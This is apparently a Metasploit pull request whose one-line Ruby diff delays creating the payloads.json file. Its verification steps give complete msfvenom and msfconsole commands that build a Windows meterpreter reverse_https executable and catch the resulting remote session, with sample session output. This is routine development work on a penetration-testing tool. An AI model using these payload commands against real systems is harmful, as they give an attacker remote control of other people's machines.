### PR TITLE
Do not create the payloads.json file until first usage

### DIFF
--- a/lib/rex/json_hash_file.rb
+++ b/lib/rex/json_hash_file.rb
@@ -17,7 +17,6 @@ class JSONHashFile
     @hash = {}
     @last = 0
     ::FileUtils.mkdir_p(::File.dirname(path))
-    synced_update
   end
 
   def [](k)


### PR DESCRIPTION
The UUID functionality currently creates a file under the home directory of the user it is running as. This can create some surprises, namely if something like the pro service starts, it can create the file under the root user's .msf4/ directory because the location is not overridden at the moment.

We want to eventually improve this database mechanism for greater scalability and better multi-user/process sharing of the data. This is just a temporary fix.
# Verification
- [x] rm ~/.msf4/payloads.json
- [x] start msfconsole, verify that .msf4/payload.json does not exist yet
- [x] create a UUID payload, e.g.

```
./msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.1 -o test.exe IgnoreUnknownPayloads=true PayloadUUIDTracking=true PayloadUUIDName="The BEST SHELL EVAAAR" -f exe
```
- [x] verify that you can start a shell and get the right UUID info anyway

```
./msfconsole -qx 'use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set lhost 192.168.56.1; run'payload => windows/meterpreter/reverse_https
lhost => 192.168.56.1
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[*] Starting the payload handler...
[*] 192.168.56.102:49186 (UUID: 37396a4f55a50394/x86=1/windows=1/2015-06-23T17:27:19Z) Staging Native payload ...
[*] Meterpreter session 1 opened (192.168.56.1:8443 -> 192.168.56.102:49186) at 2015-06-23 12:27:28 -0500

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions -v

Active sessions
===============

  Session ID: 1
        Type: meterpreter x86/win32
        Info: msf-dev\bcook @ MSF-DEV
      Tunnel: 192.168.56.1:8443 -> 192.168.56.102:49186 (192.168.56.102)
         Via: exploit/multi/handler
        UUID: 37396a4f55a50394/x86=1/windows=1/2015-06-23T17:27:19Z
   MachineID: fa360bf2674b687f83d3be2a8d70029d
     CheckIn: 1s ago @ 2015-06-23 12:27:44 -0500
  Registered: Yes - Name="The BEST SHELL EVAAAR"
```
